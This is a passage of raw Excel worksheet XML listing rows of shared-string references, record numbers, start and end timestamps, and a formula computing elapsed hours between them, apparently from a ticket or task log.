      </c>
      <c r="G335" t="s">
        <v>1302</v>
      </c>
      <c r="H335" t="str">
        <f>TEXT(F335-E335,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="336" spans="1:8" hidden="1">
      <c r="A336" t="s">
        <v>1594</v>
      </c>
      <c r="B336">
        <v>14021</v>
      </c>
      <c r="C336" t="s">
        <v>1595</v>
      </c>
      <c r="D336" t="s">
        <v>7</v>
      </c>
      <c r="E336" s="1">
        <v>43661.973564814813</v>
      </c>
      <c r="F336" s="1">
        <v>43661.988217592596</v>
      </c>
      <c r="G336" t="s">
        <v>1596</v>
      </c>
      <c r="H336" t="str">
        <f>TEXT(F336-E336,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="337" spans="1:8" hidden="1">
      <c r="A337" t="s">
        <v>1597</v>
      </c>
      <c r="B337">
        <v>14013</v>
      </c>
      <c r="C337" t="s">
        <v>1598</v>
      </c>
      <c r="D337" t="s">
        <v>7</v>
      </c>
      <c r="E337" s="1">
        <v>43661.585173611114</v>
      </c>
      <c r="F337" s="1">
        <v>43662.164965277778</v>
      </c>
      <c r="G337" t="s">
        <v>138</v>
      </c>
      <c r="H337" t="str">
        <f>TEXT(F337-E337,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="338" spans="1:8" hidden="1">
      <c r="B338">
        <v>14010</v>
      </c>
      <c r="C338" t="s">
        <v>1599</v>
      </c>
      <c r="D338" t="s">
        <v>7</v>
      </c>
      <c r="E338" s="1">
        <v>43661.463090277779</v>
      </c>
      <c r="F338" s="1">
        <v>43668.678923611114</v>
      </c>
      <c r="G338" t="s">
        <v>51</v>
      </c>
      <c r="H338" t="str">
        <f>TEXT(F338-E338,"[h]")</f>
        <v>173</v>
      </c>
    </row>
    <row r="339" spans="1:8" hidden="1">
      <c r="A339" t="s">
        <v>1600</v>
      </c>
      <c r="B339">
        <v>14009</v>
      </c>
      <c r="C339" t="s">
        <v>1601</v>
      </c>
      <c r="D339" t="s">
        <v>7</v>
      </c>
      <c r="E339" s="1">
        <v>43661.439166666663</v>
      </c>
      <c r="F339" s="1">
        <v>43685.551412037035</v>
      </c>
      <c r="G339" t="s">
        <v>28</v>
      </c>
      <c r="H339" t="str">
        <f>TEXT(F339-E339,"[h]")</f>
        <v>578</v>
      </c>
    </row>
    <row r="340" spans="1:8" hidden="1">
      <c r="A340" t="s">
        <v>1602</v>
      </c>
      <c r="B340">
        <v>14008</v>
      </c>
      <c r="C340" t="s">
        <v>1603</v>
      </c>
      <c r="D340" t="s">
        <v>7</v>
      </c>
      <c r="E340" s="1">
        <v>43661.394467592596</v>
      </c>
      <c r="F340" s="1">
        <v>43661.412847222222</v>
      </c>
      <c r="G340" t="s">
        <v>304</v>
      </c>
      <c r="H340" t="str">
        <f>TEXT(F340-E340,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="341" spans="1:8" hidden="1">
      <c r="A341" t="s">
        <v>1604</v>
      </c>
      <c r="B341">
        <v>14006</v>
      </c>
      <c r="C341" t="s">
        <v>1605</v>
      </c>
      <c r="D341" t="s">
        <v>7</v>
      </c>
      <c r="E341" s="1">
        <v>43661.256377314814</v>
      </c>
      <c r="F341" s="1">
        <v>43730.951168981483</v>
      </c>
      <c r="G341" t="s">
        <v>118</v>
      </c>
      <c r="H341" t="str">
        <f>TEXT(F341-E341,"[h]")</f>
        <v>1672</v>
      </c>
    </row>
    <row r="342" spans="1:8" hidden="1">
      <c r="A342" t="s">
        <v>1606</v>
      </c>
      <c r="B342">
        <v>14005</v>
      </c>
      <c r="C342" t="s">
        <v>1607</v>
      </c>
      <c r="D342" t="s">
        <v>7</v>
      </c>
      <c r="E342" s="1">
        <v>43661.219097222223</v>
      </c>
      <c r="F342" s="1">
        <v>43661.549305555556</v>
      </c>
      <c r="G342" t="s">
        <v>60</v>
      </c>
      <c r="H342" t="str">
        <f>TEXT(F342-E342,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="343" spans="1:8" hidden="1">
      <c r="A343" t="s">
        <v>1608</v>
      </c>
      <c r="B343">
        <v>14004</v>
      </c>
      <c r="C343" t="s">
        <v>1609</v>
      </c>
      <c r="D343" t="s">
        <v>7</v>
      </c>
      <c r="E343" s="1">
        <v>43660.965115740742</v>
      </c>
      <c r="F343" s="1">
        <v>43661.537604166668</v>
      </c>
      <c r="G343" t="s">
        <v>37</v>
      </c>
      <c r="H343" t="str">
        <f>TEXT(F343-E343,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="344" spans="1:8" hidden="1">
      <c r="A344" t="s">
        <v>1610</v>
      </c>
      <c r="B344">
        <v>14003</v>
      </c>
      <c r="C344" t="s">
        <v>1611</v>
      </c>
      <c r="D344" t="s">
        <v>7</v>
      </c>
      <c r="E344" s="1">
        <v>43660.955613425926</v>
      </c>
      <c r="F344" s="1">
        <v>43669.114178240743</v>
      </c>
      <c r="G344" t="s">
        <v>95</v>
      </c>
      <c r="H344" t="str">
        <f>TEXT(F344-E344,"[h]")</f>
        <v>195</v>
      </c>
    </row>
    <row r="345" spans="1:8">
      <c r="A345" t="s">
        <v>1612</v>
      </c>
      <c r="B345">
        <v>14002</v>
      </c>
      <c r="C345" t="s">
        <v>1613</v>
      </c>
      <c r="D345" t="s">
        <v>7</v>
      </c>
      <c r="E345" s="1">
        <v>43660.951203703706</v>
      </c>
      <c r="F345" s="1">
        <v>43662.611990740741</v>
      </c>
      <c r="G345" t="s">
        <v>1614</v>
      </c>
      <c r="H345" t="str">
        <f>TEXT(F345-E345,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="346" spans="1:8" hidden="1">
      <c r="A346" t="s">
        <v>1615</v>
      </c>
      <c r="B346">
        <v>14001</v>
      </c>
      <c r="C346" t="s">
        <v>1616</v>
      </c>
      <c r="D346" t="s">
        <v>7</v>
      </c>
      <c r="E346" s="1">
        <v>43660.918819444443</v>
      </c>
      <c r="F346" s="1">
        <v>43661.139560185184</v>
      </c>
      <c r="G346" t="s">
        <v>1539</v>
      </c>
      <c r="H346" t="str">
        <f>TEXT(F346-E346,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="347" spans="1:8" hidden="1">
      <c r="A347" t="s">
        <v>1538</v>
      </c>
      <c r="B347">
        <v>13999</v>
      </c>
      <c r="C347" t="s">
        <v>757</v>
      </c>
      <c r="D347" t="s">
        <v>7</v>
      </c>
      <c r="E347" s="1">
        <v>43660.90247685185</v>
      </c>
      <c r="F347" s="1">
        <v>43661.138344907406</v>
      </c>
      <c r="G347" t="s">
        <v>1539</v>
      </c>
      <c r="H347" t="str">
        <f>TEXT(F347-E347,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="348" spans="1:8">
      <c r="A348" t="s">
        <v>1617</v>
      </c>
      <c r="B348">
        <v>13998</v>
      </c>
      <c r="C348" t="s">
        <v>1618</v>
      </c>
      <c r="D348" t="s">
        <v>7</v>
      </c>
      <c r="E348" s="1">
        <v>43660.76489583333</v>
      </c>
      <c r="F348" s="1">
        <v>43660.87872685185</v>
      </c>
      <c r="G348" t="s">
        <v>1619</v>
      </c>
      <c r="H348" t="str">
        <f>TEXT(F348-E348,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="349" spans="1:8">
      <c r="A349" t="s">
        <v>1620</v>
      </c>
      <c r="B349">
        <v>13997</v>
      </c>
      <c r="C349" t="s">
        <v>1621</v>
      </c>
      <c r="D349" t="s">
        <v>7</v>
      </c>
      <c r="E349" s="1">
        <v>43660.760787037034</v>
      </c>
      <c r="F349" s="1">
        <v>43660.852488425924</v>
      </c>
      <c r="G349" t="s">
        <v>1120</v>
      </c>
      <c r="H349" t="str">
        <f>TEXT(F349-E349,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="350" spans="1:8">
      <c r="A350" t="s">
        <v>1622</v>
      </c>
      <c r="B350">
        <v>13996</v>
      </c>
      <c r="C350" t="s">
        <v>1623</v>
      </c>
      <c r="D350" t="s">
        <v>7</v>
      </c>
      <c r="E350" s="1">
        <v>43660.757002314815</v>
      </c>
      <c r="F350" s="1">
        <v>43660.852129629631</v>
      </c>
      <c r="G350" t="s">
        <v>98</v>
      </c>
      <c r="H350" t="str">
        <f>TEXT(F350-E350,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="351" spans="1:8" hidden="1">
      <c r="A351" t="s">
        <v>1624</v>
      </c>
      <c r="B351">
        <v>13995</v>
      </c>
      <c r="C351" t="s">
        <v>1625</v>
      </c>
      <c r="D351" t="s">
        <v>7</v>
      </c>
      <c r="E351" s="1">
        <v>43660.752592592595</v>
      </c>
      <c r="F351" s="1">
        <v>43660.817314814813</v>
      </c>
      <c r="G351" t="s">
        <v>1626</v>
      </c>
      <c r="H351" t="str">
        <f>TEXT(F351-E351,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="352" spans="1:8">
      <c r="A352" t="s">
        <v>1627</v>
      </c>
      <c r="B352">
        <v>13994</v>
      </c>
      <c r="C352" t="s">
        <v>1628</v>
      </c>
      <c r="D352" t="s">
        <v>7</v>
      </c>
      <c r="E352" s="1">
        <v>43660.748217592591</v>
      </c>
      <c r="F352" s="1">
        <v>43660.817650462966</v>
      </c>
      <c r="G352" t="s">
        <v>814</v>
      </c>
      <c r="H352" t="str">
        <f>TEXT(F352-E352,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="353" spans="1:8">
      <c r="A353" t="s">
        <v>1578</v>
      </c>
      <c r="B353">
        <v>13993</v>
      </c>
      <c r="C353" t="s">
        <v>759</v>
      </c>
      <c r="D353" t="s">
        <v>7</v>
      </c>
      <c r="E353" s="1">
        <v>43660.737650462965</v>
      </c>
      <c r="F353" s="1">
        <v>43661.539618055554</v>
      </c>
      <c r="G353" t="s">
        <v>1579</v>
      </c>
      <c r="H353" t="str">
        <f>TEXT(F353-E353,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="354" spans="1:8" hidden="1">
      <c r="A354" t="s">
        <v>1632</v>
      </c>
      <c r="B354">
        <v>13991</v>
      </c>
      <c r="C354" t="s">
        <v>1633</v>
      </c>
      <c r="D354" t="s">
        <v>7</v>
      </c>
      <c r="E354" s="1">
        <v>43660.714733796296</v>
      </c>
      <c r="F354" s="1">
        <v>43660.905844907407</v>
      </c>
      <c r="G354" t="s">
        <v>51</v>
      </c>
      <c r="H354" t="str">
        <f>TEXT(F354-E354,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="355" spans="1:8" hidden="1">
      <c r="A355" t="s">
        <v>1634</v>
      </c>
      <c r="B355">
        <v>13990</v>
      </c>
      <c r="C355" t="s">
        <v>1635</v>
      </c>
      <c r="D355" t="s">
        <v>7</v>
      </c>
      <c r="E355" s="1">
        <v>43660.70453703704</v>
      </c>
      <c r="F355" s="1">
        <v>43663.900613425925</v>
      </c>
      <c r="G355" t="s">
        <v>1520</v>
      </c>
      <c r="H355" t="str">
        <f>TEXT(F355-E355,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="356" spans="1:8">
      <c r="A356" t="s">
        <v>1636</v>
      </c>
      <c r="B356">
        <v>13989</v>
      </c>
      <c r="C356" t="s">
        <v>1637</v>
      </c>
      <c r="D356" t="s">
        <v>7</v>
      </c>
      <c r="E356" s="1">
        <v>43660.622870370367</v>
      </c>
      <c r="F356" s="1">
        <v>43660.714236111111</v>
      </c>
      <c r="G356" t="s">
        <v>1638</v>
      </c>
      <c r="H356" t="str">
        <f>TEXT(F356-E356,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="357" spans="1:8" hidden="1">
      <c r="A357" t="s">
        <v>1639</v>
      </c>
      <c r="B357">
        <v>13988</v>
      </c>
      <c r="C357" t="s">
        <v>1640</v>
      </c>
      <c r="D357" t="s">
        <v>7</v>
      </c>
      <c r="E357" s="1">
        <v>43660.618402777778</v>
      </c>
      <c r="F357" s="1">
        <v>43661.144386574073</v>
      </c>
      <c r="G357" t="s">
        <v>66</v>
      </c>
      <c r="H357" t="str">
        <f>TEXT(F357-E357,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="358" spans="1:8" hidden="1">
      <c r="A358" t="s">
        <v>1641</v>
      </c>
      <c r="B358">
        <v>13987</v>
      </c>
      <c r="C358" t="s">
        <v>1642</v>
      </c>
      <c r="D358" t="s">
        <v>7</v>
      </c>
      <c r="E358" s="1">
        <v>43660.475335648145</v>
      </c>
      <c r="F358" s="1">
        <v>43666.763807870368</v>
      </c>
      <c r="G358" t="s">
        <v>1643</v>
      </c>
      <c r="H358" t="str">
        <f>TEXT(F358-E358,"[h]")</f>
        <v>150</v>
      </c>
    </row>
    <row r="359" spans="1:8" hidden="1">
      <c r="A359" t="s">
        <v>1644</v>
      </c>
      <c r="B359">
        <v>13985</v>
      </c>
      <c r="C359" t="s">
        <v>1645</v>
      </c>
      <c r="D359" t="s">
        <v>7</v>
      </c>
      <c r="E359" s="1">
        <v>43660.140821759262</v>
      </c>
      <c r="F359" s="1">
        <v>43660.915648148148</v>
      </c>
      <c r="G359" t="s">
        <v>204</v>
      </c>
      <c r="H359" t="str">
        <f>TEXT(F359-E359,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="360" spans="1:8">
      <c r="A360" t="s">
        <v>1646</v>
      </c>
      <c r="B360">
        <v>13984</v>
      </c>
      <c r="C360" t="s">
        <v>1647</v>
      </c>
      <c r="D360" t="s">
        <v>7</v>
      </c>
      <c r="E360" s="1">
        <v>43660.091805555552</v>
      </c>
      <c r="F360" s="1">
        <v>43660.509085648147</v>
      </c>
      <c r="G360" t="s">
        <v>98</v>
      </c>
      <c r="H360" t="str">
        <f>TEXT(F360-E360,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="361" spans="1:8">
      <c r="A361" t="s">
        <v>1629</v>
      </c>
      <c r="B361">
        <v>13982</v>
      </c>
      <c r="C361" t="s">
        <v>1630</v>
      </c>
      <c r="D361" t="s">
        <v>7</v>
      </c>
      <c r="E361" s="1">
        <v>43660.081331018519</v>
      </c>
      <c r="F361" s="1">
        <v>43660.604178240741</v>
      </c>
      <c r="G361" t="s">
        <v>1631</v>
      </c>
      <c r="H361" t="str">
        <f>TEXT(F361-E361,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="362" spans="1:8" hidden="1">
      <c r="A362" t="s">
        <v>756</v>
      </c>
      <c r="B362">
        <v>13979</v>
      </c>
      <c r="C362" t="s">
        <v>757</v>
      </c>
      <c r="D362" t="s">
        <v>7</v>
      </c>
      <c r="E362" s="1">
        <v>43659.9612037037</v>
      </c>
      <c r="F362" s="1">
        <v>43660.897743055553</v>
      </c>
      <c r="G362" t="s">
        <v>51</v>
      </c>
      <c r="H362" t="str">
        <f>TEXT(F362-E362,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="363" spans="1:8" hidden="1">
      <c r="A363" t="s">
        <v>758</v>
      </c>
      <c r="B363">
        <v>13977</v>
      </c>
      <c r="C363" t="s">
        <v>759</v>
      </c>
      <c r="D363" t="s">
        <v>7</v>
      </c>
      <c r="E363" s="1">
        <v>43659.867164351854</v>
      </c>
      <c r="F363" s="1">
        <v>43660.633020833331</v>
      </c>
      <c r="G363" t="s">
        <v>536</v>
      </c>
      <c r="H363" t="str">
        <f>TEXT(F363-E363,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="364" spans="1:8" hidden="1">
      <c r="A364" t="s">
        <v>760</v>
      </c>
      <c r="B364">
        <v>13976</v>
      </c>
      <c r="C364" t="s">
        <v>761</v>
      </c>
      <c r="D364" t="s">
        <v>7</v>
      </c>
      <c r="E364" s="1">
        <v>43659.851469907408</v>
      </c>
      <c r="F364" s="1">
        <v>43660.151979166665</v>
      </c>
      <c r="G364" t="s">
        <v>95</v>
      </c>
      <c r="H364" t="str">
        <f>TEXT(F364-E364,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="365" spans="1:8" hidden="1">
      <c r="A365" t="s">
        <v>762</v>
      </c>
      <c r="B365">
        <v>13975</v>
      </c>
      <c r="C365" t="s">
        <v>763</v>
      </c>
      <c r="D365" t="s">
        <v>7</v>
      </c>
      <c r="E365" s="1">
        <v>43659.813958333332</v>
      </c>
      <c r="F365" s="1">
        <v>43734.179259259261</v>
      </c>
      <c r="G365" t="s">
        <v>764</v>
      </c>
      <c r="H365" t="str">
        <f>TEXT(F365-E365,"[h]")</f>
        <v>1784</v>
      </c>
    </row>
    <row r="366" spans="1:8" hidden="1">
      <c r="A366" t="s">
        <v>765</v>
      </c>
      <c r="B366">
        <v>13974</v>
      </c>
      <c r="C366" t="s">
        <v>766</v>
      </c>
      <c r="D366" t="s">
        <v>7</v>
      </c>
      <c r="E366" s="1">
        <v>43659.711215277777</v>
      </c>
      <c r="F366" s="1">
        <v>43663.080729166664</v>
      </c>
      <c r="G366" t="s">
        <v>201</v>
      </c>
      <c r="H366" t="str">
        <f>TEXT(F366-E366,"[h]")</f>
        <v>80</v>
      </c>
    </row>
    <row r="367" spans="1:8">
      <c r="A367" t="s">
        <v>770</v>
      </c>
      <c r="B367">
        <v>13971</v>
      </c>
      <c r="C367" t="s">
        <v>771</v>
      </c>
      <c r="D367" t="s">
        <v>7</v>
      </c>
      <c r="E367" s="1">
        <v>43659.682685185187</v>
      </c>
      <c r="F367" s="1">
        <v>43659.732164351852</v>
      </c>
      <c r="G367" t="s">
        <v>772</v>
      </c>
      <c r="H367" t="str">
        <f>TEXT(F367-E367,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="368" spans="1:8" hidden="1">
      <c r="A368" t="s">
        <v>773</v>
      </c>
      <c r="B368">
        <v>13970</v>
      </c>
      <c r="C368" t="s">
        <v>774</v>
      </c>
      <c r="D368" t="s">
        <v>7</v>
      </c>
      <c r="E368" s="1">
        <v>43659.500219907408</v>
      </c>
      <c r="F368" s="1">
        <v>43660.60261574074</v>
      </c>
      <c r="G368" t="s">
        <v>51</v>
      </c>
      <c r="H368" t="str">
        <f>TEXT(F368-E368,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="369" spans="1:8" hidden="1">
      <c r="A369" t="s">
        <v>773</v>
      </c>
      <c r="B369">
        <v>13968</v>
      </c>
      <c r="C369" t="s">
        <v>775</v>
      </c>
      <c r="D369" t="s">
        <v>7</v>
      </c>
      <c r="E369" s="1">
        <v>43657.9690625</v>
      </c>
      <c r="F369" s="1">
        <v>43659.889155092591</v>
      </c>
      <c r="G369" t="s">
        <v>66</v>
      </c>
      <c r="H369" t="str">
        <f>TEXT(F369-E369,"[h]")</f>
        <v>46</v>
      </c>
    </row>
    <row r="370" spans="1:8">
      <c r="A370" t="s">
        <v>776</v>
      </c>
      <c r="B370">
        <v>13964</v>
      </c>
      <c r="C370" t="s">
        <v>777</v>
      </c>
      <c r="D370" t="s">
        <v>7</v>
      </c>
      <c r="E370" s="1">
        <v>43656.94425925926</v>
      </c>
      <c r="F370" s="1">
        <v>43668.86513888889</v>
      </c>
      <c r="G370" t="s">
        <v>778</v>
      </c>
      <c r="H370" t="str">
        <f>TEXT(F370-E370,"[h]")</f>
        <v>286</v>
      </c>
    </row>
    <row r="371" spans="1:8" hidden="1">
      <c r="A371" t="s">
        <v>781</v>
      </c>
      <c r="B371">
        <v>13962</v>
      </c>
      <c r="C371" t="s">
        <v>782</v>
      </c>
      <c r="D371" t="s">
        <v>7</v>
      </c>
      <c r="E371" s="1">
        <v>43656.809305555558</v>
      </c>
      <c r="F371" s="1">
        <v>43656.811527777776</v>
      </c>
      <c r="G371" t="s">
        <v>138</v>
      </c>
      <c r="H371" t="str">
        <f>TEXT(F371-E371,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="372" spans="1:8" hidden="1">
      <c r="A372" t="s">
        <v>783</v>
      </c>
      <c r="B372">
        <v>13961</v>
      </c>
      <c r="C372" t="s">
        <v>784</v>
      </c>
      <c r="D372" t="s">
        <v>7</v>
      </c>
      <c r="E372" s="1">
        <v>43656.807175925926</v>
      </c>
      <c r="F372" s="1">
        <v>43659.657800925925</v>
      </c>
      <c r="G372" t="s">
        <v>138</v>
      </c>
      <c r="H372" t="str">
        <f>TEXT(F372-E372,"[h]")</f>
        <v>68</v>
      </c>
    </row>
    <row r="373" spans="1:8" hidden="1">
      <c r="A373" t="s">
        <v>785</v>
      </c>
      <c r="B373">
        <v>13954</v>
      </c>
      <c r="C373" t="s">
        <v>786</v>
      </c>
      <c r="D373" t="s">
        <v>7</v>
      </c>
      <c r="E373" s="1">
        <v>43656.329571759263</v>
      </c>
      <c r="F373" s="1">
        <v>43660.893020833333</v>
      </c>
      <c r="G373" t="s">
        <v>787</v>
      </c>
      <c r="H373" t="str">
        <f>TEXT(F373-E373,"[h]")</f>
        <v>109</v>
      </c>
    </row>
    <row r="374" spans="1:8" hidden="1">
      <c r="A374" t="s">
        <v>788</v>
      </c>
      <c r="B374">
        <v>13953</v>
      </c>
      <c r="C374" t="s">
        <v>789</v>
      </c>
      <c r="D374" t="s">
        <v>7</v>
      </c>
      <c r="E374" s="1">
        <v>43655.693449074075</v>
      </c>
      <c r="F374" s="1">
        <v>43655.778599537036</v>
      </c>
      <c r="G374" t="s">
        <v>790</v>
      </c>
      <c r="H374" t="str">
        <f>TEXT(F374-E374,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="375" spans="1:8" hidden="1">
      <c r="A375" t="s">
        <v>791</v>
      </c>
      <c r="B375">
        <v>13952</v>
      </c>
      <c r="C375" t="s">
        <v>792</v>
      </c>
      <c r="D375" t="s">
        <v>7</v>
      </c>
      <c r="E375" s="1">
        <v>43655.649398148147</v>
      </c>
      <c r="F375" s="1">
        <v>43655.696319444447</v>
      </c>
      <c r="G375" t="s">
        <v>66</v>
      </c>
      <c r="H375" t="str">
        <f>TEXT(F375-E375,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="376" spans="1:8" hidden="1">
      <c r="A376" t="s">
        <v>793</v>
      </c>
      <c r="B376">
        <v>13951</v>
      </c>
      <c r="C376" t="s">
        <v>794</v>
      </c>
      <c r="D376" t="s">
        <v>7</v>
      </c>
      <c r="E376" s="1">
        <v>43655.647951388892</v>
      </c>
      <c r="F376" s="1">
        <v>43661.573148148149</v>
      </c>
      <c r="G376" t="s">
        <v>795</v>
      </c>
      <c r="H376" t="str">
        <f>TEXT(F376-E376,"[h]")</f>
        <v>142</v>
      </c>
    </row>
    <row r="377" spans="1:8" hidden="1">
      <c r="A377" t="s">
        <v>796</v>
      </c>
      <c r="B377">
        <v>13949</v>
      </c>
      <c r="C377" t="s">
        <v>797</v>
      </c>
      <c r="D377" t="s">
        <v>7</v>
      </c>
      <c r="E377" s="1">
        <v>43655.61451388889</v>
      </c>
      <c r="F377" s="1">
        <v>43659.658009259256</v>
      </c>
      <c r="G377" t="s">
        <v>138</v>
      </c>
      <c r="H377" t="str">
        <f>TEXT(F377-E377,"[h]")</f>
        <v>97</v>
      </c>
    </row>
    <row r="378" spans="1:8" hidden="1">
      <c r="A378" t="s">
        <v>798</v>
      </c>
      <c r="B378">
        <v>13946</v>
      </c>
      <c r="C378" t="s">
        <v>799</v>
      </c>
      <c r="D378" t="s">
        <v>7</v>
      </c>
      <c r="E378" s="1">
        <v>43655.272523148145</v>
      </c>
      <c r="F378" s="1">
        <v>43657.60528935185</v>
      </c>
      <c r="G378" t="s">
        <v>66</v>
      </c>
      <c r="H378" t="str">
        <f>TEXT(F378-E378,"[h]")</f>
        <v>55</v>
      </c>
    </row>
    <row r="379" spans="1:8" hidden="1">
      <c r="A379" t="s">
        <v>800</v>
      </c>
      <c r="B379">
        <v>13945</v>
      </c>
      <c r="C379" t="s">
        <v>801</v>
      </c>
      <c r="D379" t="s">
        <v>7</v>
      </c>
      <c r="E379" s="1">
        <v>43655.234016203707</v>
      </c>
      <c r="F379" s="1">
        <v>43659.662581018521</v>
      </c>
      <c r="G379" t="s">
        <v>539</v>
      </c>
      <c r="H379" t="str">
        <f>TEXT(F379-E379,"[h]")</f>
        <v>106</v>
      </c>
    </row>
    <row r="380" spans="1:8" hidden="1">
      <c r="A380" t="s">
        <v>805</v>
      </c>
      <c r="B380">
        <v>13943</v>
      </c>
      <c r="C380" t="s">
        <v>806</v>
      </c>
      <c r="D380" t="s">
        <v>7</v>
      </c>
      <c r="E380" s="1">
        <v>43655.150810185187</v>
      </c>
      <c r="F380" s="1">
        <v>43655.18849537037</v>
      </c>
      <c r="G380" t="s">
        <v>174</v>
      </c>
      <c r="H380" t="str">
        <f>TEXT(F380-E380,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="381" spans="1:8" hidden="1">
      <c r="A381" t="s">
        <v>807</v>
      </c>
      <c r="B381">
        <v>13938</v>
      </c>
      <c r="C381" t="s">
        <v>808</v>
      </c>
      <c r="D381" t="s">
        <v>7</v>
      </c>
      <c r="E381" s="1">
        <v>43654.621076388888</v>
      </c>
      <c r="F381" s="1">
        <v>43720.932233796295</v>
      </c>
      <c r="G381" t="s">
        <v>809</v>
      </c>
      <c r="H381" t="str">
        <f>TEXT(F381-E381,"[h]")</f>
        <v>1591</v>
      </c>
    </row>
    <row r="382" spans="1:8" hidden="1">
      <c r="A382" t="s">
        <v>810</v>
      </c>
      <c r="B382">
        <v>13935</v>
      </c>
      <c r="C382" t="s">
        <v>811</v>
      </c>
      <c r="D382" t="s">
        <v>7</v>
      </c>
      <c r="E382" s="1">
        <v>43654.23878472222</v>
      </c>
      <c r="F382" s="1">
        <v>43660.881122685183</v>
      </c>
      <c r="G382" t="s">
        <v>28</v>
      </c>
      <c r="H382" t="str">
        <f>TEXT(F382-E382,"[h]")</f>
        <v>159</v>
      </c>
    </row>
    <row r="383" spans="1:8">
      <c r="A383" t="s">
        <v>812</v>
      </c>
      <c r="B383">
        <v>13933</v>
      </c>
      <c r="C383" t="s">
        <v>813</v>
      </c>
      <c r="D383" t="s">
        <v>7</v>
      </c>
      <c r="E383" s="1">
        <v>43653.975358796299</v>
      </c>
      <c r="F383" s="1">
        <v>43654.524004629631</v>
      </c>
      <c r="G383" t="s">
        <v>814</v>
      </c>
      <c r="H383" t="str">
        <f>TEXT(F383-E383,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="384" spans="1:8">
      <c r="A384" t="s">
        <v>815</v>
      </c>
      <c r="B384">
        <v>13930</v>
      </c>
      <c r="C384" t="s">
        <v>816</v>
      </c>
      <c r="D384" t="s">
        <v>7</v>
      </c>
      <c r="E384" s="1">
        <v>43653.881712962961</v>
      </c>
      <c r="F384" s="1">
        <v>43663.912835648145</v>
      </c>
      <c r="G384" t="s">
        <v>16</v>
      </c>
      <c r="H384" t="str">
        <f>TEXT(F384-E384,"[h]")</f>
        <v>240</v>
      </c>
    </row>
    <row r="385" spans="1:8">
      <c r="A385" t="s">
        <v>817</v>
      </c>
      <c r="B385">
        <v>13929</v>
      </c>
      <c r="C385" t="s">
        <v>818</v>
      </c>
      <c r="D385" t="s">
        <v>7</v>
      </c>
      <c r="E385" s="1">
        <v>43653.671770833331</v>
      </c>
      <c r="F385" s="1">
        <v>43662.822662037041</v>
      </c>
      <c r="G385" t="s">
        <v>819</v>
      </c>
      <c r="H385" t="str">
        <f>TEXT(F385-E385,"[h]")</f>
        <v>219</v>
      </c>
    </row>
    <row r="386" spans="1:8" hidden="1">
      <c r="A386" t="s">
        <v>820</v>
      </c>
      <c r="B386">
        <v>13928</v>
      </c>
      <c r="C386" t="s">
        <v>821</v>
      </c>
      <c r="D386" t="s">
        <v>7</v>
      </c>
      <c r="E386" s="1">
        <v>43653.577384259261</v>
      </c>
      <c r="F386" s="1">
        <v>43657.608854166669</v>
      </c>
      <c r="G386" t="s">
        <v>822</v>
      </c>
      <c r="H386" t="str">
        <f>TEXT(F386-E386,"[h]")</f>
        <v>96</v>
      </c>
    </row>
    <row r="387" spans="1:8" hidden="1">
      <c r="A387" t="s">
        <v>779</v>
      </c>
      <c r="B387">
        <v>13920</v>
      </c>
      <c r="C387" t="s">
        <v>780</v>
      </c>
      <c r="D387" t="s">
        <v>7</v>
      </c>
      <c r="E387" s="1">
        <v>43651.759618055556</v>
      </c>
      <c r="F387" s="1">
        <v>43656.725590277776</v>
      </c>
      <c r="G387" t="s">
        <v>510</v>
      </c>
      <c r="H387" t="str">
        <f>TEXT(F387-E387,"[h]")</f>
        <v>119</v>
      </c>
    </row>
    <row r="388" spans="1:8">
      <c r="A388" t="s">
        <v>802</v>
      </c>
      <c r="B388">
        <v>13876</v>
      </c>
      <c r="C388" t="s">
        <v>803</v>
      </c>
      <c r="D388" t="s">
        <v>7</v>
      </c>
      <c r="E388" s="1">
        <v>43646.811759259261</v>
      </c>
      <c r="F388" s="1">
        <v>43652.964097222219</v>
      </c>
      <c r="G388" t="s">
        <v>804</v>
      </c>
      <c r="H388" t="str">
        <f>TEXT(F388-E388,"[h]")</f>
        <v>147</v>
      </c>
    </row>
    <row r="389" spans="1:8" hidden="1">
      <c r="A389" t="s">
        <v>767</v>
      </c>
      <c r="B389">
        <v>13812</v>
      </c>
      <c r="C389" t="s">
        <v>768</v>
      </c>
      <c r="D389" t="s">
        <v>7</v>
      </c>
      <c r="E389" s="1">
        <v>43636.858368055553</v>
      </c>
      <c r="F389" s="1">
        <v>43659.68577546296</v>
      </c>
      <c r="G389" t="s">
        <v>769</v>
      </c>
      <c r="H389" t="str">
        <f>TEXT(F389-E389,"[h]")</f>
        <v>547</v>
      </c>
    </row>
    <row r="390" spans="1:8">
      <c r="A390" t="s">
        <v>1648</v>
      </c>
      <c r="B390">
        <v>13605</v>
      </c>
      <c r="C390" t="s">
        <v>1649</v>
      </c>
      <c r="D390" t="s">
